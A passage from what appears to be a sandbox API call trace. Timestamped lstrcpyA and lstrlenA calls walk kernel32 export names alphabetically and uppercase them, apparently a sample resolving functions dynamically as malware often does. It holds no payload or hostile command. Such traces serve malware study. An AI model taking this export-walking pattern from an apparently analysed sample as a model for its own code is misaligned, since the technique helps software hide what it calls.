lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.156] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.156] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.156] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.156] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.156] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.156] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.156] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.156] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.156] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.156] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.156] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.156] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.156] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.156] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.156] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.156] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.156] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.156] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.156] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.156] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.156] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.156] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.156] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.156] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.156] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.156] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.156] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.156] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.156] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.157] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.157] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.157] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.157] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.157] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.157] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.157] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.157] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.157] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.157] lstrlenA (lpString="BEEP") returned 4 [0079.157] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.157] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.157] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.157] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.157] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.157] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.157] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.157] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.157] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.157] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.157] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.157] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.157] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.157] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.157] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.157] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.157] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.157] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.157] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.157] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.157] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.157] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.157] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.157] lstrlenA (lpString="CANCELIO") returned 8 [0079.157] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.157] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.157] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.158] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.158] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.158] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.158] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.158] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.158] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.158] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.158] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.158] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.158] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.158] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.158] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.158] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.158] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.158] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.158] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.158] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.158] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.158] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.158] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.158] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.158] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.158] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.158] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.158] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.158] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.158] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.158] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.158] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.158] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.158] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.158] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.158] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.158] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.158] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.158] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.158] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.159] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.159] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.159] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.159] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.159] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.159] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.159] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.159] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.159] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.159] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.159] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.159] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.159] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.159] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.159] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.159] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.159] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.159] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.159] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.159] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.159] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.159] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.159] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.159] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.159] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.159] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.159] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.159] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.159] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.159] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.159] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.159] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.159] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.159] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.159] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.159] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.159] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.159] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.160] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.160] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.160] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.160] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.160] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.160] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.160] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.160] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.160] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.160] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.160] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.160] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.160] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.160] lstrlenA (lpString="COPYFILEA") returned 9 [0079.160] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.160] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.160] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.160] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.160] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.160] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.160] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.160] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.160] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.160] lstrlenA (lpString="COPYFILEW") returned 9 [0079.160] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.160] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.160] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.160] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.160] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.160] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.160] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.160] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.160] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.160] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.160] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.160] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.161] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.161] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.161] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.161] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.161] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.161] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.161] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.161] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.161] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.161] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.161] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.161] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.161] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.161] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.161] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.161] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.161] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.161] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.161] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.161] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.161] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.161] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.161] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.161] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.161] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.161] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.161] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.161] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.161] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.161] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.161] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.161] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.161] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.161] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.161] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.161] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.162] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.162] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.162] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.162] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.162] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.162] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.162] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.162] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.162] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.162] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.162] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.162] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.162] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.162] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.162] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.162] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.162] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.162] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.162] lstrcpyA 